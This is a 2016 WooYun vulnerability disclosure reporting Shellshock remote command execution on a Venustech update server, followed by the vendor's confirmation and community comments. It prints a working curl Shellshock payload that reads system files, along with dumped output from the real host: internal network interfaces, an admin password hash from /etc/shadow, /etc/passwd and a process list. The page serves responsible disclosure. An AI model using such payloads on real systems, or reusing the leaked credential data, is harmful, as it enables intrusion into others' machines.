当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170913

漏洞标题:启明星辰某服务器存在远程命令执行漏洞

相关厂商:北京启明星辰信息安全技术有限公司

漏洞作者: 猪猪侠

提交时间:2016-01-18 18:27

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

启明星辰某服务器存在远程命令执行漏洞,服务器有4块网卡,设置了7个C段的内网IP地址

详细说明:

#1 服务器
https://updates.venustech.com.cn/
#2 漏洞描述
Bash shellshock Vul

? (192.168.7.49) at 00:13:20:bf:a3:eb [ether] on eth3.2
? (192.168.7.170) at 04:7d:7b:b4:63:f8 [ether] on eth3.2
? (192.168.5.67) at 90:b1:1c:6c:95:e4 [ether] on eth3.3
? (192.168.7.147) at d0:67:e5:06:d6:22 [ether] on eth3.2
? (192.168.99.99) at 00:90:fb:52:60:7d [ether] on eth5
? (124.207.17.78) at <incomplete> on eth3.7
? (192.168.9.15) at 96:6c:d2:0b:8c:f3 [ether] on eth3.7
? (192.168.5.33) at 78:45:c4:05:bc:b4 [ether] on eth3.3
? (124.207.17.65) at 00:12:43:78:58:00 [ether] on eth2
? (124.207.17.74) at <incomplete> on eth3.7
? (192.168.9.109) at 1a:97:a3:0a:c5:8b [ether] on eth3.4
? (192.168.7.45) at 00:22:19:04:bf:4e [ether] on eth3.2
? (124.207.17.70) at <incomplete> on eth3.8
? (192.168.9.10) at 14:fe:b5:d4:25:6f [ether] on eth3.7
? (192.168.9.8) at a6:d1:84:f1:a6:a8 [ether] on eth3.7
? (124.207.17.76) at <incomplete> on eth3.7
? (192.168.5.30) at 18:03:73:37:47:34 [ether] on eth3.3
? (124.207.17.77) at a6:d1:84:f1:a6:a8 [ether] on eth3.7
? (192.168.7.222) at 38:22:d6:a1:27:dc [ether] on eth3.2
? (192.168.5.200) at 78:45:c4:06:0e:7f [ether] on eth3.3
? (192.168.7.179) at <incomplete> on eth3.2
? (192.168.99.20) at b8:ac:6f:3e:b9:24 [ether] on eth5
? (192.168.9.9) at 3e:54:4b:28:95:13 [ether] on eth3.7
? (192.168.7.196) at 68:f7:28:b9:c9:97 [ether] on eth3.2
? (192.168.99.230) at b0:51:8e:00:dc:e3 [ether] on eth5
? (192.168.7.153) at 1c:fa:68:fe:b9:49 [ether] on eth3.2
? (192.168.5.85) at 78:a1:06:a0:93:f3 [ether] on eth3.3
? (192.168.9.103) at 00:19:d1:5a:5c:91 [ether] on eth3.4


eth2      Link encap:Ethernet  HWaddr 00:e0:4c:50:29:28  
inet addr:124.207.17.66 Bcast:124.207.17.67 Mask:255.255.255.252
inet6 addr: fe80::2e0:4cff:fe50:2928/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:509587196 errors:0 dropped:150 overruns:0 frame:0
TX packets:447431051 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:477215383114 (444.4 GiB) TX bytes:102776363246 (95.7 GiB)
Interrupt:18 Memory:d0200000-d0220000
eth3 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29
inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2753536727 errors:0 dropped:6301 overruns:0 frame:0
TX packets:2704033675 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2398944004498 (2.1 TiB) TX bytes:2645235946740 (2.4 TiB)
Interrupt:19 Memory:d0300000-d0320000
eth5 Link encap:Ethernet HWaddr 00:e0:4c:50:29:2b
inet addr:192.168.99.1 Bcast:192.168.99.255 Mask:255.255.255.0
inet6 addr: fe80::2e0:4cff:fe50:292b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2775236580 errors:0 dropped:1087224 overruns:0 frame:0
TX packets:168683223 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:215766978251 (200.9 GiB) TX bytes:159408116401 (148.4 GiB)
Interrupt:17 Memory:d0500000-d0520000
eth3.2 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29
inet addr:192.168.7.1 Bcast:192.168.7.255 Mask:255.255.255.0
inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:139999170 errors:0 dropped:0 overruns:0 frame:0
TX packets:178749034 errors:0 dropped:49 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:24650666919 (22.9 GiB) TX bytes:196673483318 (183.1 GiB)
eth3.3 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29
inet addr:192.168.5.1 Bcast:192.168.5.255 Mask:255.255.255.0
inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:827207656 errors:0 dropped:0 overruns:0 frame:0
TX packets:1659932700 errors:0 dropped:441 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:71391019200 (66.4 GiB) TX bytes:2305127162311 (2.0 TiB)
eth3.4 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29
inet addr:192.168.9.97 Bcast:192.168.9.127 Mask:255.255.255.224
inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:38196894 errors:0 dropped:0 overruns:0 frame:0
TX packets:32701192 errors:0 dropped:546 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:38057682408 (35.4 GiB) TX bytes:21081238644 (19.6 GiB)
eth3.5 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29
inet addr:192.168.8.1 Bcast:192.168.8.255 Mask:255.255.255.0
inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:12150050 errors:0 dropped:0 overruns:0 frame:0
TX packets:15849901 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2263388346 (2.1 GiB) TX bytes:15154916440 (14.1 GiB)
eth3.6 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29
inet addr:192.168.10.1 Bcast:192.168.10.255 Mask:255.255.255.0
inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:96227890 errors:0 dropped:0 overruns:0 frame:0
TX packets:7267281 errors:0 dropped:39 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:8879882984 (8.2 GiB) TX bytes:7411205232 (6.9 GiB)
eth3.7 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29
inet addr:192.168.9.1 Bcast:192.168.9.31 Mask:255.255.255.224
inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1639751756 errors:0 dropped:0 overruns:0 frame:0
TX packets:809504545 errors:0 dropped:21 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2215151596571 (2.0 TiB) TX bytes:99786721439 (92.9 GiB)
eth3.8 Link encap:Ethernet HWaddr 00:e0:4c:50:29:29
inet addr:124.207.17.69 Bcast:124.207.17.71 Mask:255.255.255.252
inet6 addr: fe80::2e0:4cff:fe50:2929/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3311 errors:0 dropped:0 overruns:0 frame:0
TX packets:29016 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:253892 (247.9 KiB) TX bytes:1218888 (1.1 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:86767 errors:0 dropped:0 overruns:0 frame:0
TX packets:86767 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:113560276 (108.2 MiB) TX bytes:113560276 (108.2 MiB)

漏洞证明:

#3 证明

curl cgi-url -A "() { foo;};echo;/bin/cat /etc/hosts" -k
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost USAP
192.168.9.125 update.lyxtech.com


admin:$6$3Z7FbI1E$Tdnx3/Yx8cqq1xZzbobGnBo91MAR9RPjnixIjSy2tx0X943RONZLLAlLScvOXj5sLPy3du2EX9iMKKMzYqe60/:16287:0:99999:7:::
sshd:!!:13153:0:99999:7:::
ldap:!!:13153:0:99999:7:::
mysql:!!:13195:0:99999:7:::


cat /etc/passwd 
admin:x:0:0:root:/usap/boot:/bin/bash
daemon:x:1:1:daemon:/usr/local/usap/center/bin:/bin/nologin
www:x:33:33:www:/usr/local/usap/center/web:/bin/nologin
sshd:x:74:74::/var/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
mysql:x:500:500::/home/mysql:/sbin/nologin


UID        PID  PPID  C STIME TTY          TIME CMD
admin 1 0 0 2015 ? 00:03:17 init [2]
admin 2 0 0 2015 ? 00:00:00 [kthreadd]
admin 3 2 0 2015 ? 00:00:04 [migration/0]
admin 4 2 0 2015 ? 00:48:19 [ksoftirqd/0]
admin 5 2 0 2015 ? 00:00:00 [watchdog/0]
admin 6 2 0 2015 ? 00:00:09 [migration/1]
admin 7 2 11 2015 ? 11-08:44:30 [ksoftirqd/1]
admin 8 2 0 2015 ? 00:00:00 [watchdog/1]
admin 9 2 0 2015 ? 00:15:58 [events/0]
admin 10 2 0 2015 ? 00:07:19 [events/1]
admin 11 2 0 2015 ? 00:00:00 [cpuset]
admin 12 2 0 2015 ? 00:00:00 [khelper]
admin 13 2 0 2015 ? 00:00:00 [netns]
admin 14 2 0 2015 ? 00:00:00 [async/mgr]
admin 15 2 0 2015 ? 00:00:00 [pm]
admin 16 2 0 2015 ? 00:00:10 [sync_supers]
admin 17 2 0 2015 ? 00:00:16 [bdi-default]
admin 18 2 0 2015 ? 00:00:00 [kintegrityd/0]
admin 19 2 0 2015 ? 00:00:00 [kintegrityd/1]
admin 20 2 0 2015 ? 00:00:07 [kblockd/0]
admin 21 2 0 2015 ? 00:00:10 [kblockd/1]
admin 22 2 0 2015 ? 00:00:16 [kacpid]
admin 23 2 0 2015 ? 00:00:01 [kacpi_notify]
admin 24 2 0 2015 ? 00:00:00 [kacpi_hotplug]
admin 25 2 0 2015 ? 00:00:00 [kseriod]
admin 28 2 0 2015 ? 01:15:21 [kondemand/0]
admin 29 2 0 2015 ? 01:17:09 [kondemand/1]
admin 30 2 0 2015 ? 00:00:02 [khungtaskd]
admin 31 2 0 2015 ? 00:00:27 [kswapd0]
admin 32 2 0 2015 ? 00:00:00 [ksmd]
admin 33 2 0 2015 ? 00:00:00 [aio/0]
admin 34 2 0 2015 ? 00:00:00 [aio/1]
admin 35 2 0 2015 ? 00:00:00 [xfs_mru_cache]
admin 36 2 0 2015 ? 00:02:06 [xfslogd/0]
admin 37 2 0 2015 ? 00:00:00 [xfslogd/1]
admin 38 2 0 2015 ? 00:05:10 [xfsdatad/0]
admin 39 2 0 2015 ? 00:00:00 [xfsdatad/1]
admin 40 2 0 2015 ? 00:00:00 [xfsconvertd/0]
admin 41 2 0 2015 ? 00:00:00 [xfsconvertd/1]
admin 42 2 0 2015 ? 00:00:00 [crypto/0]
admin 43 2 0 2015 ? 00:00:00 [crypto/1]
admin 279 2 0 2015 ? 00:00:00 [ksuspend_usbd]
admin 280 2 0 2015 ? 00:00:00 [ata/0]
admin 281 2 0 2015 ? 00:00:00 [khubd]
admin 282 2 0 2015 ? 00:00:00 [ata/1]
admin 283 2 0 2015 ? 00:00:00 [ata_aux]
admin 284 2 0 2015 ? 00:00:00 [scsi_eh_0]
admin 285 2 0 2015 ? 00:00:00 [scsi_eh_1]
admin 290 2 0 2015 ? 00:00:00 [scsi_eh_2]
admin 291 2 0 2015 ? 00:00:00 [scsi_eh_3]
admin 324 2 0 2015 ? 00:03:33 [flush-8:0]
admin 469 2 0 2015 ? 00:00:31 [xfsbufd]
admin 470 2 0 2015 ? 00:00:44 [xfsaild]
admin 471 2 0 2015 ? 00:00:02 [xfssyncd]
admin 473 2 0 2015 ? 00:00:47 [xfsbufd]
admin 474 2 0 2015 ? 00:00:49 [xfsaild]
admin 475 2 0 2015 ? 00:00:04 [xfssyncd]
admin 477 2 0 2015 ? 00:00:00 [loop0]
admin 581 1 0 2015 ? 00:00:00 udevd --daemon
admin 635 581 0 2015 ? 00:00:00 udevd --daemon
admin 636 581 0 2015 ? 00:00:00 udevd --daemon
admin 670 2 0 2015 ? 00:00:00 [kconservative/0]
admin 671 2 0 2015 ? 00:00:00 [kconservative/1]
admin 722 2 0 2015 ? 00:00:00 [USAPTASK]
admin 723 2 0 2015 ? 00:00:00 [KUSHSNDMSG]
admin 729 2 0 2015 ? 00:00:03 [kClearNet]
admin 773 1 0 2015 ? 00:00:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/DB --pid-file=/usr/local/mysql/DB/NSG.pid
mysql 1269 773 1 2015 ? 1-07:42:01 /usr/local/mysql/bin/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/DB --plugin-dir=/usr/local/mysql/lib/plugin --user=mysql --log-error=/usr/local/mysql/DB/NSG.err --pid-file=/usr/local/mysql/DB/NSG.pid --socket=/tmp/mysql.sock --port=3306
admin 1453 1 0 2015 ? 00:18:19 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
admin 1464 1 0 2015 ? 00:32:10 /usr/bin/rsyslogd -c4
admin 1541 1 0 2015 ? 00:03:45 /usr/local/usap/center/bin/billingd
admin 1565 1 0 2015 ? 01:51:21 /usr/local/usap/center/bin/dbbackupd
admin 1567 1 0 2015 ? 00:00:00 /usr/local/usap/center/bin/ipmacbind_record
admin 1585 1 0 2015 ? 01:11:57 /usr/local/usap/center/bin/HDMonitor
admin 1594 1 0 2015 ? 00:02:10 /sbin/dhcpd -cf /usr/local/usap/center/config/dhcpd.conf eth3.2 start
admin 1597 1 0 2015 ? 01:05:50 /usr/local/usap/center/bin/bwserverd
admin 2103 1 0 2015 ? 00:16:44 /sbin/sshd
admin 2106 1 0 2015 ? 00:00:15 /usr/bin/cron
admin 2107 1 0 2015 tty1 00:00:00 /sbin/getty 38400 tty1
admin 2108 1 0 2015 ttyS0 00:00:00 /sbin/getty -L 9600 ttyS0 vt100
admin 19474 20565 3 Jan04 ? 11:58:15 /usr/local/usap/center/bin/ClearNet -D
admin 19478 2 0 Jan04 ? 00:04:09 [KernelDPI]
admin 20565 1 0 2015 ? 00:00:00 /usr/local/usap/center/bin/ClearNet -D
admin 21691 1453 0 18:22 ? 00:00:00 /usr/local/usap/center/web/login.cgi
admin 21694 21691 0 18:22 ? 00:00:00 sh -c rm -rf /tmp/tmp_arptable
admin 21695 21694 0 18:22 ? 00:00:00 /bin/ps -ef

修复方案:

更新或者下线

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-20 17:58

厂商回复:

这个是第三方厂商的系统,之前处于测试状态未正式启用。经测试确认问题存在,现已下线跟三方厂商联系修补。 多谢猪猪侠。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-18 18:32 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:63 | 潜心代码审计。)

    沙发

  2. 2016-01-18 18:36 | 土夫子 ( 普通白帽子 | Rank:453 漏洞数:80 | 看似山穷水尽,终将柳暗花明)

    pa pa pa

  3. 2016-01-18 18:58 | 带馅儿馒头 认证白帽子 ( 核心白帽子 | Rank:1325 漏洞数:150 | 心在,梦在)

    猪哥V5

  4. 2016-01-18 19:03 | SH0X8001 ( 路人 | Rank:25 漏洞数:6 | 你猜)

    屌屌屌

  5. 2016-01-18 20:17 | 坏男孩-A_A ( 实习白帽子 | Rank:41 漏洞数:17 | 膜拜学习中)

    666

  6. 2016-01-18 20:20 | k0_pwn ( 实习白帽子 | Rank:96 漏洞数:13 | 专注且自由)

    猪哥年底了,给程序猿留条活路啊!

  7. 2016-01-18 21:04 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 多乌云、多机会!微信公众号: id:a301zls ...)

    年底了。。

  8. 2016-01-18 21:58 | getshell1993 认证白帽子 ( 核心白帽子 | Rank:898 漏洞数:99 | ~!@#¥%……&*)

    停不下来啊....

  9. 2016-01-18 22:17 | 毛毛虫 ( 普通白帽子 | Rank:143 漏洞数:46 | 执著->寂寞->孤单->绽放)

    猪哥就是牛牛牛!!!

  10. 2016-01-18 22:25 | Let a person cry. ( 实习白帽子 | Rank:31 漏洞数:11 | xxoo)

    你看,我说对了吧,猪猪侠是在年底大冲刺,各大厂商都会来一发或者多发,让程序员加班的

  11. 2016-01-19 00:32 | 少宇 ( 路人 | Rank:18 漏洞数:7 | 多看书,多实践,多泡妹子!!)

    快年底了,还让不让人愉快地过年了!

  12. 2016-01-19 08:40 | luwikes ( 普通白帽子 | Rank:532 漏洞数:79 | 潜心学习~~~)

    猪猪侠对各大安全厂商的安全做了简单测试

  13. 2016-01-19 09:48 | 齐迹 ( 普通白帽子 | Rank:790 漏洞数:103 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    请猪猪侠来我网逛逛。>_<

  14. 2016-01-19 09:55 | 路人毛 ( 实习白帽子 | Rank:66 漏洞数:27 | Please speak in Chinese.)

    存货都出来了

  15. 2016-01-19 13:06 | 换个昵称 ( 路人 | Rank:9 漏洞数:4 | 1)

    年终奖没了你赔呀

  16. 2016-02-23 10:11 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)

    猪猪侠扫描器真腻害

  17. 2016-02-25 15:19 | H.U.C-人 族 ( 路人 | Rank:9 漏洞数:4 | 热爱网络安全)

    求跟班